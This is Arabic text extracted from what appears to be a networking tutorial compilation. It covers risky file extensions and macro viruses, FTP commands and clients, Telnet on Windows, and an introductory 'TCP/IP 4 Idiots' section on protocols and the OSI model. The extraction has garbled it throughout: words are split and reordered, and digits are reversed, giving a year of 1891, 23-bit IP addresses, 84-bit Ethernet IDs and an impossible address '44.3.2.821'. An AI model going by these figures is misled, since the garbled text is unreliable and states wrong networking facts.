uue ­ xxe ­ b64 ­ exe ­ com ­ bat ­ dll ­ drv ­ sys ­ bin‬‬ ‫‪  ،­ bhx‬كما يمكن أن تنتقل فیروسات الماكرو عبر تطبیقات ‪ ،MS Office‬لذلك‪   ‬‬ ‫م قبل تشغیلھا‪                           .‬‬ ‫احذر من ھذه الملفات وافحصھا دائ ً‬ ‫ا‪                                         ‬‬ ‫طريقة نقل الملفات ‪                                                     :FTP‬‬ ‫ھناك طرق عديدة لنقل الملفات وھي‪                                       :‬‬ ‫•‪        ‬نقل الملفات باستخدام نظام ‪                                     UNIX‬‬ ‫تتطلب ھذه العملیة عادة استخدام أوامر وھاھنا بعض أوامر ‪             :UNIX‬‬ ‫‪ :ascii‬لنقل ملفات ‪ ASCII‬النصیة‪ ،‬وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات‬ ‫من ھذا النوع فیجب اعادة المر‪                                              .‬‬ ‫‪ :binary‬لنقل الملفات الثنائیة‪ ،‬وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات‪   ‬‬ ‫من ھذا النوع فیجب اعادة المر‪                                              .‬‬ ‫‪ :status‬لفحص الملف ومعرفة ھل ھو من نوع ‪ ASCII‬أو ‪               .Binary‬‬ ‫‪ :help‬لعرض قائمة بأوامر ‪                                              .UNIX‬‬ ‫‪ :dir‬عرض محتويات الدلیل‪                                                    ‬‬ ‫‪ :ls‬عرض محتويات الدلیل الحالي‪                                            .‬‬ ‫‪ :cd directory‬تغییر الدلیل‪                                                   .‬‬ ‫‪ :filename get‬جلب الملف المطلوب وانزاله على جھازك‪                     .‬‬ ‫‪:filename mget‬جلب مجموعة من الملفات‪                                 .‬‬ ‫‪ :pwd‬طباعة الدلیل الحالي‪                                                  .‬‬ ‫‪ :bye‬انھ اء الرتباط والخروج من النظام البعید‪                                 .‬‬ ‫•‪         ‬نقل الملفات باستخدام حساب ‪                                  :Shell‬‬ ‫‪                                     23‬‬ ‫أول ماتفعله في ھذا النوع من نقل الملفات ھو ادخال الملقن الخاص بشركة‪  ‬‬ ‫توفیر الخدمة فمث ً سوف تدخل حسابك في ‪ Tripod‬عن طريق ‪   ،Unix Shell‬‬ ‫ل‪                                                           ‬‬ ‫نكتب أو ً المر ‪ ftp‬متبوع ً بالوجھة المرادة فیصبح‪ ftp ftp.tripod.com :‬ثم‪     ‬‬ ‫ل‪                                                    ‬‬ ‫ا‬ ‫ندخل السم وھو عل سبیل المثال "‪ ،"IronPrivate‬ثم نقوم بادخال الرقم‪     ‬‬ ‫السري وھ و مث ً "******"‪ .‬وبعد الدخول الى الحساب يمكنك استخدام نفس‬ ‫ل‪                                                              ‬‬ ‫أوامر ‪ Unix‬المعتادة‪                                                         .‬‬ ‫•‪      ‬نقل الملفات باستخدام المتصفح ‪                              :Browser‬‬


‫عنوان‪  ‬‬ ‫ن‬ ‫نقل الملفات عن طريق المتصفحات سھل جد ً فما علیك سوى ادخال‬ ‫اا‪                                 ‬‬ ‫‪        http‬‬ ‫الموقع ‪ URL‬ويبدأ العنوان بكلمة ‪  ftp://‬ثم العنوان بد ً من كلمة ‪h ://‬‬ ‫ل‪                           ‬‬ ‫ل‬ ‫للعناوين العادية‪ ،‬بعد الدخول الى موقع الـ‪ FTP‬ستأتي الصفحة عبارة عن ملفات‬ ‫ت‬ ‫لنزاله‪                    .‬‬ ‫‪.‬‬ ‫ومجلدات وماعلیك سوى النقر على الملف المطلوب‬ ‫•‪       ‬نقل الملفات باستخدام حساب ‪                               :SLIP/PPP‬‬ ‫•‬ ‫تابعة‪    ‬‬ ‫ة‬ ‫أفضل استخدامات ھذا النوع من الربط أنھ ا تسمح لنا باستخدام برامج‬ ‫ھو‪  ‬‬ ‫‪  .Client Programs‬وأفضل برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬و‬ ‫‪                                                               .Ws_ftp‬‬ ‫‪.‬‬ ‫برنامج‬ ‫‪                                          :5.06 Ws_ftp LE‬‬ ‫‪:‬‬ ‫ استخدام برنامج‬‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج‪ ،‬سیظھر لك مربع‬ ‫ع‬ ‫ة‪ ‬‬ ‫حوار ‪ Profile Session‬والذي من خلله تقوم بتسجیل الدخول‪ ،‬اكتب في خانة‬ ‫‪ My Home Page In‬‬ ‫‪M‬‬ ‫‪ Profile Name‬اسم حساب الدخول؛ على سبیل المثال‬ ‫‪ Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي ھذا المثال ھو‪         ‬‬ ‫م‪         ‬‬ ‫‪ ftp.tripod.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم‬ ‫بالتدقیق التلقائي في نوع نظام الجھ از المضیف‪ ،‬بعد ذلك قم بكتابة السم في‬ ‫ي‬ ‫‪    Password‬‬ ‫‪P‬‬ ‫خانة ‪ User ID‬وھو مث ً ‪ IronPrivate‬ثم الرقم السري في خانة‬ ‫ل‪                                                      ‬‬ ‫ل‬ ‫ل‪     ‬‬ ‫ی على ھیئة نجوم ******‪ ,‬ثم اضغط ‪ .OK‬كما في الشكل‬ ‫وسیظھر مخف ً‬ ‫اا‪                                                               ‬‬ ‫التالي‪                                                                       :‬‬ ‫‪:‬‬ ‫‪                                      33‬‬ ‫نافذة‪    ‬‬ ‫ة‬ ‫بعد ذلك سیقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم‬ ‫اليمن‪ ‬‬ ‫ن‬ ‫البرنامج الى قسمین؛ القسم اليسر ھو جھ از الكمبیوتر لديك والقسم‬ ‫ھو جھ از الكمبیوتر المضیف‪ ،‬في ھذه المرحلة تستطیع جلب أو ارسال الملفات‬ ‫ت‬ ‫حسابك‪  ‬‬ ‫ك‬ ‫أو تغییر اسمائھا أو حذفھ ا ‪ ...‬الخ‪ .‬أي تستطیع التحكم في محتويات‬ ‫فائقة‪                                 .‬‬ ‫‪.‬‬ ‫على النترنت أو على جھازك بسھولة‬ ‫•‪         ‬نقل الملفات باستخدام التصال الشبكي البعید ‪                 :Telnet‬‬ ‫•‬ ‫ح‪           ‬‬ ‫‪ Telnet‬ھي بروتوكول انترنت معیاري لخدمات الربط عن بعد ويسمح‬ ‫ذلك‪  ‬‬ ‫للمستخدم بربط جھازه على كمبیوتر مضیف جاع ً جھازه وكأنه جزء من ك‬ ‫ل‪                            ‬‬ ‫ل‬ ‫الكمبیوتر البعید‪ .‬ويختلف العرض حسب نظام الكمبیوتر المضیف‪ .‬اذا كان الجھازز‬ ‫ر‪    ‬‬ ‫البعید يستخدم نظام ‪ Windows‬فل مشكلة أما اذا كان يستخدم نظام آخر‬ ‫فیجب معرفة بعض الوامر للتحكم وأھ م أمر يجب أن تعرفه ھو "؟" والذي يحضر‬ ‫ر‬ ‫اللزمة‪                                                      .‬‬ ‫‪.‬‬ ‫لك قائمة بالوامر‬ ‫‪                                     :Windows‬‬ ‫‪:‬‬ ‫ استخدام برنامج ‪ Telnet‬من‬‫ط‪    ‬‬ ‫ج سھ ً يسمى ‪ Telnet‬يمكنك الدخول علیه بالضغط‬ ‫ترفق ‪ Windows‬برنام ً‬ ‫اا‪                                                 ‬‬ ‫ل‬ ‫ة‪   ‬‬ ‫على قائمة ابدأ ‪ Start‬ثم تشغیل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة‬ ‫البدء للبرنامج‪ ..‬من ‪ Connect‬اختر ‪ .System Remote‬في صندوق الحوارر‪       ‬‬ ‫‪ Connect‬الذي سیظھر لك اكتب في خانة ‪ Host Name‬اسم ملقن الجھازز‪    ‬‬ ‫المضیف ثم اكتب في خانة ‪ Port‬المیناء أو المنفذ ( اذا كان لديك) او اتركه كماا‪ ‬‬ ‫ط‪ ‬‬ ‫ھو‪ ،‬ثم اختر من الـ ‪ ، Term Type‬ان كان لديك وال قم بالتجربة‪ .‬بعد ذلك اضغط‬ ‫‪                                      43‬‬ ‫د‪  ‬‬ ‫‪  Connect‬وعندما يتم الربط فستحتاج لدخال السم والرقم السري‪ .‬وبعد‬ ‫‪.‬‬ ‫‪.Exit‬‬ ‫النتھاء من النقل اختر‪ Disconnect‬من قائمة ‪ Connect‬وبعد ذلك اختر‬ ‫‪                               53‬‬ ‫ل‪                       ‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الول‬ ‫‪                                                          SaD.jAcKAl‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬


‫الجزء الول ==== ‪                                          TCP/IP 4 Idiots‬‬ ‫= المقدمة =‪                                                                 ‬‬ ‫يمثل ‪ TCP/IP‬من الناحیة العلمیة مجموعة من الوسائل التي تمكن الحواسیب‬ ‫المشبكة‪                                                                     ‬‬ ‫من التصال فیما بینھ ا ‪ ،‬بصرف النظر عما اذا كانت تنتمي الي الشبكة ذاتھا او‪ ‬‬ ‫إلي شبكات منفصلة ‪ ،‬وما اذا كانت من نوع واحد او من انواع مختلفة ‪ ،‬ويمثل‪ ‬‬ ‫‪ TCP/IP‬مجموعة من المعايیر القیاسیة‪ ،‬المستقلة عن منصات العتاد التي‪     ‬‬ ‫يؤمن التصال فیما بینھا‪ ،‬وھ و يجسر الفجوة بین الحواسیب ونظم التشغیل‪     ‬‬ ‫والشبكات المختلفة‪ ،‬و ‪ TCP/IP‬كذلك البروتوكول الذي يحرك شبكة النترنت‪    ‬‬ ‫العالمة التي يعود الیھاا الفضل الساسي في شھرته الواسعة ‪ ...‬تقوم‪        ‬‬ ‫بروتوكولت ‪ TCP/IP‬علي تقنیة ‪ Packet Switching‬تبديل الرزم ‪ ...‬وتبديل الرزم‪ ‬‬ ‫تعني تقسیم البیانات الي رزم ‪ Packet‬منفصلة وحیدة الھوية التي تشكل بعد‪ ‬‬ ‫جمعھا البیانات كلیا ‪                                                        ..‬‬ ‫= نظرة علي ‪                                                      = TCP/IP‬‬ ‫في السبعینیات قامت وكالة مشروع البحاث المتطورة ‪ ARPA‬بتطوير تقنیة‪     ‬‬ ‫تبديل الرزم وتم ربطھا بـ ‪ Network Control Protocol NCP‬بروتوكول التحكم في‬ ‫الشبكة ‪                                                                    ..‬‬ ‫ولم تكن ‪ TCP‬بروتوكول التحكم في النقل نشرت بعد في وثائق ‪) RFC‬اقرا‪      ‬‬ ‫الشرح حول ‪ RFC‬وھ ي وثائق تشرح وتحدد قیاسیات انترنت ) ‪ ...‬ال سنة ‪1891‬‬ ‫( راجع الوثیقة رقم ‪ 397‬و ‪                                           ... ) 197‬‬ ‫وطور بروتوكول ‪ TCP/IP‬نتیجة لبحاث مولتھا وكالة مشروع البحاث المتطورة‪   ‬‬ ‫‪  ARPA‬التابعة للحكومة المريكیة في مطلع السبعینیات ‪ ،‬وبفضل بروتوكول‪      ‬‬ ‫‪                                      63‬‬ ‫‪ TCP/IP‬أضبح بإمكان شبكات البحوث العلمیة حول العالم أن تتصل‪ ،‬لتشكل‪     ‬‬ ‫فیما بینھا شبكة افتراضیة يشار إلیھا باسم ‪ ، Internet Work‬وتعتبر ھذه‪       ‬‬ ‫الشبكة الفتراضیة النموذج الول لشبكة انترنمت بعد أن تحول الخلیط الذي‪     ‬‬ ‫كان قائما من الشبكات والذي عرف باسم ‪ Arpanet‬إلي العمل وفقا لبروتوكول‪  ‬‬ ‫‪  ، TCP/IP‬وأصبحت الشبكة الناتجة العمود الفقري لشبكة إنترنت التي نعرفھا‪  ‬‬ ‫الیوم‪                                                                          .‬‬ ‫= أساسیات ‪                                                        = TCP/IP‬‬ ‫يمثل الختصار ‪ TCP/IP‬العبارة ‪      Transmission Control Protocol/Internet‬‬ ‫‪  Protocol‬أي بروتوكول التحكم بالنقل ‪ /‬بروتوكول انترنت ‪ .‬ويعرف البروتوكول في‪ ‬‬ ‫مصطلحات الشبكات بأنه طريقة قیاسیة متفق علیھا ‪ ،‬تتیح لحاسوبین تبادل‪    ‬‬ ‫البیانات‪ ،‬ويتألف ‪ TCP/IP‬من بروتوكولت عديدة تربو علي المائة ‪ ،‬ولذلك كثیرا ما‬ ‫يشار الیھا بعبارة مجموعة ‪ ، TCP/IP‬حیث يشكل ‪ TCP‬و ‪ IP‬البروتوكولین‪        ‬‬ ‫الساسین في المجموعة ‪                                                   .‬‬ ‫تمثل برمجیات ‪ TCP/IP‬التي تركبھا علي حاسوبك‪ ،‬تجسیدا محددا لھذا‪         ‬‬ ‫البروتوكول ملئما خصیصا لمنصة العتاد التي تستخدمھا‪ ،‬وتتضمن ھذه‪           ‬‬ ‫البرمجیات عادة برامج تطبیقیة عالیة المستوي مثل ‪ ) FTP‬بروتوكول نقل‪        ‬‬ ‫الملفات ) والذي يسمح للمستخدمین بإنجاز نقل الملفات عبر الشبكة‪ ،‬من‪    ‬‬ ‫خلل سطر الوامر المستخدم لنظام التشغیل المستخدم في أجھزتھم ‪      ..‬‬ ‫===== البروتوكول ======‪                                               ‬‬ ‫‪ Protocol‬بروتوكول‪                                                             ‬‬ ‫ھو اللغة التي تتخاطب بھا أجھ زة الكمبیوتر المتصلة عبر الشبكة‪ ،‬بھدف تبادل‪  ‬‬ ‫المعلومات‪ .‬وإذا أردنا تعريف البروتوكول بلغة تقنیة‪ ،‬نقول أنه وصف رسمي‪       ‬‬ ‫لھیئات الرسائل والقواعد التي يجب على كمبیوترين اتباعھا لتبادل تلك‪          ‬‬ ‫الرسائل‪ .‬تستطیع البروتوكول وصف تفاصیل البنیة التحتیة للواجھة البینیة بین‪  ‬‬ ‫كمبیوترين اتباعھ ا لتبادل تلك الرسائل‪ .‬تستطیع البروتوكولت وصف تفاصیل‪     ‬‬ ‫البنیة التحتیة للواجھ ة البینیة بین كمبیوترين ( مثل ترتیب البتات والبايتات‪       ‬‬ ‫ض‪ ،‬وصف عملیات التبادل التي تجري بین‪ ‬‬ ‫المرسلة عبر السلك )‪ .‬وتستطیع أي ً‬


‫ا‪                                        ‬‬ ‫البرامج على مستوى البنیة الفوقیة ( مثل الطريقة التي يتبادل بھا برنامجان‪   ،‬‬ ‫الملفات عبر إنترنت )‪                                                           ‬‬ ‫‪                                       73‬‬ ‫===‪                                                                          ‬‬ ‫السبب الذي يجعل من ‪ TCP/IP‬مھما للغاية ھذه اليام ھو أنه يسمح‪            ‬‬ ‫للشبكات المستقلة بالتصال مع إنترنت‪ ،‬أو التصال مع بعضھا لشتكل شبكات‪  ‬‬ ‫إنترانت خاصة‪ ،‬تتصل الشبكات المكونة لنترانت فیزيئیا بواسطة أجھزة تسمي‪ ‬‬ ‫الموجھات ‪ Router‬أو موجھات ‪ . IP‬والموجه ھو حاسوب قوم بنقل رزم من‪       ‬‬ ‫البیانات من حاسوب لخر‪                                                      .‬‬ ‫تنتقل المعلومات ضمن شبكة إنترانت العاملة وفق بروتوكول ‪ TCP/IP‬في‪         ‬‬ ‫وحدات منفصلة تسمي رزم ‪ ( IP (IP PACKET‬أو جزئیات بیانات ‪          IP (IP‬‬ ‫‪                                                                   (Datagrams‬‬ ‫وتؤمن برمجیات ‪ TCP/IP‬التصال بین أي حاسوبین متصلین الي شبكة تعمل‪   ‬‬ ‫وفقا لھ ذا البروتوكول ‪ .‬ويخفي بروتوكول ‪ TCP/IP‬عملیا الموجھات ومعمارية‪      ‬‬ ‫الشبكة ويجعل كل شيء يبدو كشبكة كبیرة واحدة ‪ .‬وكما أن الصلة إلي شبكة‬ ‫‪ Ethernet‬تعرف بواسطة ھوية ‪ Ethernt ID‬بطول ‪ 84‬بت‪ ،‬وكذلك فإن الوصل‪     ‬‬ ‫إلي انترانت يعرف بواسطة عنوان ‪                                            IP‬‬ ‫بطول ‪ 23‬بت‪ ،‬ويعبر عن ھذا العنوان بواسطة أعداد عشرؤية منقطة مثل‪         ‬‬ ‫‪                                                                     44.3.2.821‬‬ ‫وعند إسناذ عنوان ‪ IP‬لحاسوب بعید يممكن لحاسوب مرتبط إلي إنترانت او‪      ‬‬ ‫إنترنت أن يرسل البیانات إلي ذلك الكمبیوتر تماما كما لو أن الحاسوبین بین جزء‬ ‫من الشبكة الفیزيائیة نفسھا ‪                                                ...‬‬ ‫يقدم ‪ TCP/IP‬حل لمسئلة إمكانیة تبادل البیانات بین حاسوبین متصلین إلي‪   ‬‬ ‫النترانت ذاته ‪ ،‬ولكنھ ا ينتمیان إلي شبكات فیزيائیة مختلفة‪ ،‬وياتي حل ھذه‪   ‬‬ ‫المسئلة في أجزاء متعددة بحیث يؤدي كل عضو من عائلة ‪ TCP/IP‬نصیبه في‪  ‬‬ ‫حل جزء من المسئلة‪                                                          ‬‬ ‫يرسل بروتوكول ‪ IP‬وھو البروتوكول الھم في طاقم ‪ TCP/IP‬رزم بیانات ‪ IP‬عبر‪  ‬‬ ‫النترانت‪ ،‬ويتطلب ذلك القیام بعملیة ھامة للغاية تسمي التوجیه ‪ Routing‬أي‪ ‬‬ ‫اختیار الممر الذي ستسلكه رزم البیانات عبر الشبكة للوصول من ‪ A‬إلي ‪    . B‬‬ ‫ويمثل ‪ TCP‬بروتوكول المستوي العلي الذي يسمح لتطبیقات منفذة علي‪      ‬‬ ‫حواسیب مضیفة مختلفة بتبادل تیارات ‪ Streams‬من البیانات ‪ ،‬ويقسم‪           ‬‬ ‫بروتوكول ‪ TCP‬تیارات البیانات إلي كتل تسمي مقاطع ‪ TCP Segments‬ويقوم‪   ‬‬ ‫بنقل ھذه المقاطع مستخدما بروتوكول ‪                                     . IP‬‬ ‫وفي معظم الحال ترسل كل قطعة ‪ TCP‬بواسطة رزمة البیانات ‪ IP‬وحیدة‪ ،‬ولكن‪ ‬‬ ‫عند الضرورة يقوم بروتوكول ‪ TCP‬بتقسیم المقطع إلي عدة رزم بیانات ‪      ، IP‬‬ ‫‪                                        83‬‬ ‫بحیث تصبح متوافقة مع إطارات البیانات الفیزيائیة التي تحمل البینات والبايتات‪ ‬‬ ‫بین الحاوسیب المضیفة علي الشبكة ‪ ,‬بما أن بروتوكول ‪ IP‬ل يضمن وصول رزم‬ ‫البیانات بالترتیب ذاته الذي ارسل به‪ ،‬يقوم بروتوكول ‪ TCP‬بتجیمع مقاطع ‪ TCP‬‬ ‫في الطرف الخر لیشكل منھا تیار بیانات متصل‪ ،‬يعتبر كل من ‪ FTP‬و ‪    telnet‬‬ ‫مثال مألوفا لتطبیقات ‪ TCP/IP‬المعتمدة علي ‪ TCP‬ويمثل بروتوكول ‪ UDP‬عضوا‪ ‬‬ ‫آخر مھما في مجموعة ‪ TCP/IP‬وھ و بروتوكول رزم بیانات المستخدم‪ ،‬وھو‪      ‬‬ ‫مشابه لبروتوكول ‪ TCP‬لكنه أكثر بدائیة‪ ،‬يعتبر ‪ TCP‬بروتوكولت موثوقا لنه يقوم‬ ‫بالتحري عن الخطاء المحتملة ‪ Error Checking‬وإجراءات المصافحة‪             ‬‬ ‫‪ handshaking‬اللزمة للتأكد من ان البیانات تصل سلیمة إلي ھدفھا ‪         ..‬‬ ‫ول يعتبر بروتوكول ‪ UPD‬موثوقا لنه ل يضمن وصول رزم البیانات بالترتیب الذي‪  ‬‬ ‫أرسلت به أو يضمن حتي مجرد وصولھ ا‪ ،‬وإذا كانت الموثوقیة مطلوبة فإن‪       ‬‬ ‫تحقیقھ ا يقع علي عاتق التطبیق المعني ‪ .‬ومع ذلك يبقي لبروتوكول ‪     UDP‬‬ ‫مكانه في عالم ‪ TCP/IP‬وثمة عدد من التطبیقات التي تستخدمه ‪ .‬ويعد‪       ‬‬


‫بروتوكول إدارة الشبكة البسیطة ‪ SNMP‬المتوفر مع معظم أدوات ‪ TCP/IP‬أحد‪  ‬‬ ‫تطبیقاتا بروتوكول ‪                                                         UDP‬‬ ‫تلعب بروتوكولت أخري أدوارا ھا أقل بروزا لكنھا ل تقل أھمیة عن غیرھا في‪   ‬‬ ‫تشغیل شبكات ‪ . TCP/IP‬فمثل يترجم حل شیفرة العنوان ‪ ARP‬عنوان ‪ IP‬إلي‪ ‬‬ ‫عنوان شبكة فیزيائي ‪ ،‬مثل عناوين إيثرنت‪ ،‬وھناك بروتوكول حل شیرة العنوان‪ ‬‬ ‫العكسي ‪ RARP‬وھ و يؤدي الوظیفة المعاكسة أي أنه يحول العنوان الفیزيائي‪  ‬‬ ‫إلي عنوان ‪ . IP‬أما بروتوكول رسائل التحكم بإنترنت ‪ ICMP‬فھو بروتوكول داعم‪  ‬‬ ‫يستخدم ‪ IP‬ليصال معلومات التحكم‪ ،‬وتلك المتعلقة بحصول خطأ أثناء نقل رزم‬ ‫‪ ، IP‬إذا لم يكن الموجه قادرا مثل علي إرسال رزم بیانات ‪ IP‬يقوم باستعمال‪   ‬‬ ‫‪ ICMP‬لعلم المرسل بوجود مشكلة ‪                                         .‬‬ ‫تنقسم البروتوكولت بشكل عام الى قسمین‪                                :‬‬ ‫‪                                                     1­ .Connection­Oriented‬‬ ‫‪                                                           2­ .Connectionless‬‬ ‫يقوم البروتوكول من النوع الول ‪ Connection­Oriented‬بإعداد اتصال مباشر‪    ‬‬ ‫يسمى دائرة ظاھرية أو افتراضیة ‪ Virtual Circuit‬بین الجھزة المتصلة في‪     ‬‬ ‫الشبكة‪                                                                     .‬‬ ‫و يحقق ھ ذا التصال المباشر موثوقیة عالیة لتسلیم البیانات و لكنه قد يؤدي‪   ‬‬ ‫الى بطئ في عمل و أداء الشبكة‪                                             .‬‬ ‫‪                                      93‬‬ ‫يعتبر بروتوكول ‪ (Transmission Control Protocol(TCP‬مثال واضحا على‪        ‬‬ ‫البروتوكولت محددة وجھة التصال ‪                     .Connection­Oriented‬‬ ‫بینما البروتوكولت من النوع الثاني ‪ Connectionless‬فإنھا ل توفر اتصال مباشرا‪ ‬‬ ‫مع الكمبیوتر المستقبل قبل إرسال البیانات‪ ،‬مما يعني أن البیانات تنتقل‪       ‬‬ ‫بسرعة أكبر مما يحسن من أداء الشبكة‪ ،‬و لكن ھذه الطريقة لیست تامة‪     ‬‬ ‫الموثوقیة نظرا لنه ل سبیل لمعرفة فیما إذا حدثت أخطاء أثناء الرسال أم لم‪   ‬‬ ‫تحدث‪                                                                     .‬‬ ‫يعتبر بروتوكول ‪ UDP‬مثال واضحا على البروتوكولت عديمة التصال‪             ‬‬ ‫‪                                                           .Connectionless‬‬ ‫= معمارية الطبقات‪ TCP/IP‬و ‪                                     = ISO/OSI‬‬ ‫عند مناقشة معماريات الشبكة‪ ،‬غالبا ما يستخدم مصمموا الشبكات نموذج‪    ‬‬ ‫‪                                                                  ISO/OSI‬‬ ‫منظمة المقايیس العالمیة ‪ /‬وصل النظمة المفتوحة ‪           Open System‬‬ ‫‪ Interconnection‬ذا الطبقات السبع‪ ،‬حیث تمثل كل طبقة في النموذج‪         ‬‬ ‫مستوي من فعالیات الشبكة‪ ،‬ونجد في القعر الطبقة الفیزيائیة ‪Physical Layer‬‬ ‫والتي تمثل الوسط الفیزيائي الذي تنتقل المعلومات من خلله أي كابلت‪       ‬‬ ‫التشبیك‪ ،‬وتتوضع فوق تلك الطبقة طبقة توصیل البیانات ‪     Data­Link Layer‬‬ ‫والتي توفر خدماتھ ا بواسطة بطاقات الشبكة‪ ،‬الطبقة العلي ھي طبقة‪        ‬‬ ‫التطبیقات ‪ Application Layer‬التي تنفذ فیھ ا برامج التطبیقات العاملة في بیئة‬ ‫الشبكة‪                                                                   .‬‬ ‫العملیة الكاملة لنقل البیانات على الشبكة تمر بمجموعة من الخطوات‪ ،‬و في‪  ‬‬ ‫كل خطوة معینة تنفذ مھ ام محددة ل يمكن تنفیذھا في خظوة أخرى‪ ،‬و لكل‪   ‬‬ ‫خطوة بروتوكول محدد أو مجموعة بروتوكولت في طبقة محددة تحدد كیفیة‪    ‬‬ ‫تنفیذ المھام المتعلقة بھذه الخطوة‪ ،‬كما أن ھذه الخطوات تكون متشابھة لكل‪ ‬‬ ‫جھاز على الشبكة‪ ،‬كما يجب ملحظة أن الجھاز المرسل يقوم باتباع ھذه‪      ‬‬ ‫الخطوات من العلى الى السفل بینما يقوم الجھاز المستقبل باتباع ھذه‪      ‬‬ ‫الخطوات بشكل معكوس من السفل الى العلى ‪                           ..‬‬ ‫يوضح الشكل الرسمي مخطط ‪ TCP/IP‬مع نموذج ‪                    ISO/OSI‬‬ ‫‪                              http://www.freewebz.com/sadjackal/tcp.jpg‬‬ ‫‪                                      04‬‬ ‫ويوضح الشكل كذلك البنیة الطبقیة لبروتوكول ‪ TCP/IP‬ويظھر العلقة بین نواة‪   ‬‬


‫البروتوكولین ‪ .‬عند نزول مطقع بیانات من شبكة التطبیقات إلي بطاقة‪            ‬‬ ‫التشبیك‪ ،‬فإنھا تنتقل عبر واحدات ‪ TCP/IP‬المتتالیة ويتم رزمھا بالمعلومات‪       ‬‬ ‫التي تتطلبھا وحدة ‪ TCP/IP‬المناظرة في الطرف الخر‪ ،‬في كل خطوة من‪        ‬‬ ‫المسار وتكون عند وصول البیانات إلي بطاقة التشبیك وعلي شكل إطار ‪Frame‬‬ ‫ايثرنت قیاسي‪                                                                ‬‬ ‫وتقوم برمجیات ‪ TCP/IP‬في الجھة المستقبلة بإعادة تشكیل البیانات الصلیة‪  ‬‬ ‫للتطبیق المستقبل وذلك بالتقاط أطر ايثرنت وتمريرھا عبر مكدس ‪     ، TCP/IP‬‬ ‫وتتمثل أفضل الطرق لفھم ‪ TCP/IP‬من الداخل باستخدام برامج من نوع ‪Sniffer‬‬ ‫( مقتفي الثر ) للنظر داخل الطارات التي تجول حول الشبكة ‪ .‬وملحظة‪        ‬‬ ‫المعلومات المضافة من قبل وحدات ‪ TCP/IP‬المتعددة ‪                           .‬‬ ‫لتصوير الدور الذي يلعبه ‪ TCP/IP‬في العالم الحقیقي للشبكات لننظر إلي ما‪    ‬‬ ‫يحدث عند قیام برنامج تصفح الشبكى ‪ Web‬الذي يستخدم بروتوكول نقل النص‬ ‫المتشعب ‪ HTTP‬باسترجاع صفحة البیانات بھیئة ‪ HTML‬من مزود شبكة ‪ Web‬‬ ‫في انترنت ‪                                                                  .‬‬ ‫يستخدم مصفح الشبكة تجريدا برمجیا عالي المستوي‪ ،‬يسمي المقبس‪        ‬‬ ‫‪ Socket‬لتشكل وصلة افتراضیة إلي المزود ولسترجاع صحفة ‪ Web‬يرسل‪       ‬‬ ‫المتصفح الشبكة امر ‪ GET‬بلغة ‪ HTTP‬إحضار إلي المزود ‪ ،‬وذلك بكتابة المر‪     ‬‬ ‫الي المقبس فتقوم برمجیات المقبس بدورھا باستخدام بروتوكول ‪ TCP‬لرسال‪ ‬‬ ‫البتات والبايتات المشكلة لمر ‪ GET‬إلي مزود ‪ Web‬ويقسم ‪ TCP‬البیانات ويمرر‪ ‬‬ ‫المقاطع المنفردة إلي وحدة ‪ IP‬التي ترسلھا بدورھا علي شكل رزم بیانات إلي‬ ‫مزود ‪ Web‬إذا كان متصفح الشبكة والمزود متصلین بشبكات فیزيائیة مختلفة (‪ ‬‬ ‫كما ھي الحال عادة ) فعندھا تذھب رزم البیانات من شبكة إلي أخري ‪ ،‬إلي‪   ‬‬ ‫حین وصولھا إلي الشبكة التي يتصل بھا المزود فیزيائیا وتسلم رزم البیانات‪      ‬‬ ‫بالنتیجة إلي المستقبل ويعاد تشكیلھ ا بحیث تدور بالنسبة لمزود ‪ Web‬الذي‪   ‬‬ ‫يقرأ كتل البیانات بتنفیذ عملیة القراءة من المقبس كتیار مستمر من البیانات‪    ‬‬ ‫ويبدو ظھ ور البیانات المكتوبة الي المقبس في احدي النھايات‪ ،‬عند النھاية‪       ‬‬ ‫الخري بالنسبة للمزود ولمتصفح الشبكة‪ ،‬وكأنه يتم بفعل سحري‪ ،‬لكن في‪   ‬‬ ‫العماق تحثل كل أصناف التفاعلت المعقدة‪ ،،‬لخلق النطباع بحصول تدفق‪      ‬‬ ‫متصل للبیانات عبر الشبكة ‪                                                   .‬‬ ‫ومجمل ما يقوم به ‪ TCP‬ھو تحويل عدد كبیر من الشبكات الصغیرة إلي شبكة‪  ‬‬ ‫كبیرة وتقديم كافة الخدمات والتطبیقات اللزمة للتصال بین ھذه الشبكات ‪     ،‬‬ ‫عبر شركة إنترنت الناتجة عن ھذا الوصل ‪                                       .‬‬ ‫‪                                         14‬‬ ‫= ‪ ISO/OSI‬نموذج =‪                                                        ‬‬ ‫وبروتوكولت ‪ TCP/IP‬في الحقیقة تحتوي علي بروتوكولت عدة تتوضع في‪     ‬‬ ‫نموذج مكدس ‪ Protocol Stack ( Stack‬ھي مجموعة من البروتوكولت‪         ‬‬ ‫المتكاملة في عملھا معا‪ ،‬و كل طبقة في ھذه المجموعة تحتوي على‪        ‬‬ ‫بروتوكول مختلف يقوم بوظیفة مختلفة)‪                                       ‬‬ ‫علي شكل طبقات ‪ Layers‬يجب أن ينظم عمل البروتوكولت المختلفة حتى ل‪ ‬‬ ‫يحدث أي تعارض أو نقص في عملھا‪                                         .‬‬ ‫يطلق على تنظیم المھ ام بین البروتوكولت المختلفة اسم ‪           Layering‬‬ ‫ويطلق مصطلح ‪ Binding‬على الطريقة التي يتم بھ ا ربط البروتوكولت و ترتیبھا‪ ‬‬ ‫معا لتكوين ‪                                                 . Protocol Stack‬‬ ‫الطبقة السابعة ‪ -‬التطبیقات ‪                                    Application‬‬ ‫الطبقة السادسة – التمثیل ‪                                 Representation‬‬ ‫الطبقة الخامسة – الجلسة ‪                                         Session‬‬ ‫الطبقة الرابعة – النقل ‪                                             Transport‬‬ ‫الطبقة الثالثة الشبكة ‪                                              Network‬‬ ‫الطبقةا لثانیة ‪ -‬وصل البیانات ‪ ) Data Link‬تحتوي علي طبقتین فرعییتن ‪ MAC‬‬ ‫و ‪                                                                      ( LLC‬‬


